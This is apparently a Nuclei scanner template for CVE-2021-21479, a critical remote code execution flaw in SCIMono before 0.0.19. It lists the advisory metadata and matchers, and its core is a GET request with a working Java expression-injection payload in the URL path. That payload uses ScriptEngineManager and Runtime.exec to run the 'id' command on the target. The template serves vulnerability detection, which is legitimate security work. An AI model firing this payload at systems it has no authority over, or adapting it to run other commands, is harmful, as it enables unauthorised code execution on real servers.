id: CVE-2021-21479

info:
  name: SCIMono < v0.0.19 Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    In SCIMono before 0.0.19, it is possible for an attacker to inject and execute a Java expression, compromising the availability and integrity of the system.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-21479
    cwe-id: CWE-74
  tags: cve,cve2021,scimono,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"

    matchers:
      - type: word
        words:
          - "The attribute value"
          - "java.lang.UNIXProcess@"
          - "has invalid value!"
          - '"status" : "400"'
        part: body
        condition: and